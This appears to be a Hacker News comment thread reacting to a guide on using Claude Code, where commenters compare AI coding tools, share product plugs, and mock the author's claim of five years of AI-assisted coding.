Yes, the technical preview of Github Copilot. I rounded up.
fair enough! the jump from that to ChatGPT’s launch (which I didn’t find that interesting), to gpt-4, to Claude Code/Codex CLI, to Gemini 3/Opus 4.5/GPT 5.2 has been insane in such a short time. I’m excited (since the release of the Codex CLI especially: https://dkdc.dev/posts/modern-agentic-software-engineering/)
More importantly: what software of value have they produced in that time? I glanced around their site, just saw a bunch of teaching materials about Ai.
https://github.com/SilenNaihin
Github Copilot was available in 2021, believe it or not. It was just auto-complete plus a chat window, but it seemed like a big deal at the time.
If auto-complete is AI coding then I've been doing it since 2001.
This caught me by surprise. Wow time flies.
If AI can 10x then that's 50 years worth of development. Likely OP has developed a UNIX like operating system, is my guess.
10x in personal branding position for sure. 5 years of AI usage by rounding up a 4 years-something, where the first 2 were really a glorified autocomplete and top 0.01% of something something.
And they have already retired.
I heard they created Plan10: An AI-files based Linux version.
Plan 10 from Latent Space
Keyboard autocomplete?
I use cursor on a daily basis. It is good for a certain use cases. Horribly bad for some other. Read the below one by keeping that in mind! I am not an LLM skeptic.
It is wild that people are ao confident with AI that they're not testing the code at all?
What are we doing as a programmer? Reducing the typing + testing time? Because we have to write the prompt in English and do software design otherwise AI systems write a billion lines of code just to add two numbers.
This hype machine should show tangible outputs, and before anyone says they're entitled to not share their hidden talents then they should stop publishing articles as well.
You can't have your cake and have it too!
Anyone tried claude code with z.ai subscription?
It's only for a fraction of the price, but 3 times as much limits.
I currently use github subscription for hobby projects.
Was also tempted by the price but GLM-4.6 was so terrible that I instantly subscribed to Claude again, it's just not worth it. Don't know if 4.7 is much improved but for me nothing can compete with Claude sadly.
Nothing competes with Opus 4.5 in Claude Code. Codex & Gemini are arguable.
Yeah, but I tought at 29 USD for a year with 3 times the limit it might be able to compete.
But I will probably check out claudecode next month when my github copilot subscription runs out.
Edit: I found this: https://www.reddit.com/r/ClaudeCode/comments/1q6f62t/tried_n... Seems like it might be worth to check it out. Found a 10% discount that works on the additional discount so now it would be 26 USD / year.
Also found this discussion, where it's much more of a mixed bag: https://np.reddit.com/r/LocalLLaMA/comments/1pveluj/honestly...
Codex 5.2 XHigh + 5.2 Pro as oracle is the leader for getting to working solutions
This is a good guide on how to use Claude code. My perspective (from an early adopter of LLMs for coding) is similar. Though, open code has a lot of potential as well. So I'm happy that Claude Code is not the only option. But a key aspect imo is that, using these tools is also a skill; And there's a lot of knowledge involved in making something good with the assistance of Claude code vs doing slop. Specially as soon as you deviate from a very basic application / work in a larger repo with multiple people. There's a layer of context that these tools don't quite have, and it's very difficult to consistently provide them with. I can see this being less the case as context windows and the reliability of larger context retrieval is solved.
Appreciate it! And agree. I added a longer comment above saying basically this.
I'm copacetic to the notion we're not at enterprise codebase level (yet), but everyone who still thinks agentic coding stops at React CRUD apps needs to update their priors.
I needed a poc RAG pipeline to demo concepts to other teams. Built and tested this over the weekend, exclusively with Claude Code and a little OpenCode. Mix of mobile app and breaking out Android terminal to allow Sonnet 4.5 to run the dotnet build chain on tricky compilation issues.
https://github.com/pixelbadger/Pixelbadger.Toolkit.Rag
Not sure why you’re getting downvoted, but that’s exactly what AI is turning out great for.. being able to make something in a weekend that would’ve taken weeks otherwise means other things downstream of it suddenly also become possible.
> a poc RAG pipeline
Why would that be any harder than a React app? At least for me having an LMM produce a decent and consistent UI layout is not that straightforward
This reads like a useful guide, not an answer to the question "why use Claude code over cursor" that the author includes at the beginning.
Any suggestions on what to add to answer the question better? I tried to cover this in "Why I switched", "When to use Cursor", and "My current setup" sections.
Sometimes it's what you remove not what you add. I realise this is hard for a token generator to understand.
Top 0.01% user of a code LLM demonstrates extreme unwillingness to learn anything.
I have recently started using Github Copilot for some small personal projects and am blown away how fast it is possible to create a solution that does the job. Of course its not optimized for security or scaling, but it doesn't have to be. Most mindblowing moment was when Copilot searched API documentation and implemented everything just asking me to add my API key to the .env. Wild times.
Regarding not reviewing the output: AI works great when you’re trying to sell it.
That being said, after seeing inside a couple YC backed SaaS companies I believe you can get by without reading the code. There are bugs _everywhere_, yet one of these companies made it years and sold. Currently going through the onerous process of fixing this as new company has a lot of interest in reducing the defect count. It is painful, difficult, and feeling like the company bought a lemon.
I think the reality is there’s a lot of money to be made with buggy software. But, there’s still plenty of money in making reliable software as well (I think?).
Claude code all the way! If anybody wants to help me beta test my own web-based set up for managing multiple claude code instances on hetzner vpses: clodhost.com!
Do we really need to qualify our power user level down to 100ppm percentiles...?
Comparing digital penile volume is a time-honored tradition!
This. Also I'm quoting the email they sent me.
Just completely hilarious how 6 months ago about 50% of hackernews comments were AI denialists telling everybody they were full of shit and that LLM was not useful. That group is awfully quiet nowadays. The bar has clearly moved to "eventually we won't even need to do code reviews".
LLM denialists were always wrong and they should be embarrassed to share their bad model of reality and how the world works.
"LLM denialists".
You mean people who don't like statistical models trained on random code, with no oversight or vetting of the training material?
No, we're still the majority.
Please stop sending PRs to open source projects that are just thousands and thousands of lines of random slop. We're tired of seeing them.
Like I said, it's embarrassing to hold onto a model of a world that does not match reality for this long but if it helps you cope...
Wouldn’t this kind of setup eat away tokens at a very fast rate and even the max plan will be quickly overrun? Isn’t this a viable workflow to use Claude code to create just one pull request at a time, lightly review the code and allow it to be merged?
I'd love to have you as a top user on autohand [.] ai/cli and interested in your experience with us.
Is it just me, or has Claude Code gotten really stupid the last several days. I've been using it almost since it was publicly released, and the last several days it feels like it reverted back 6 months. I was almost ready to start yolo-ing everything, and now it's doing weird hallucinations again and forgetting how to edit files. It used to go into plan mode automatically, now it won't unless I make it.
what the fuck this articles supposed to be? interesting read at first but down below it become really disorganized almost like aslop
How can I improve it in the future? The intention was to start as a story, and become more of a structured guide as you read on.
> my experience from 5 years of coding with AI
5 years? You were coding with AI in January 2021 - mid pandemic?
Can we please not fill Hacker News with this obvious rubbish?
> I was a top 0.01%
wow
> This is a guide that combines:
> 1. my experience from 5 years of coding with AI
It is a testament to the power of this technology that the author has managed to fit five years of coding with AI in between 2023 and now
> AI in between 2023 and now
And produce nothing of substance besides more incestuous content about AI and AI-development.
Brb perfecting time dilation to become better buds with this cloud based productivity tool suite
I'd love to have you as a top user on autohand [.] ai/cli and interested in your experience with us. We're a bootstrap ai lab.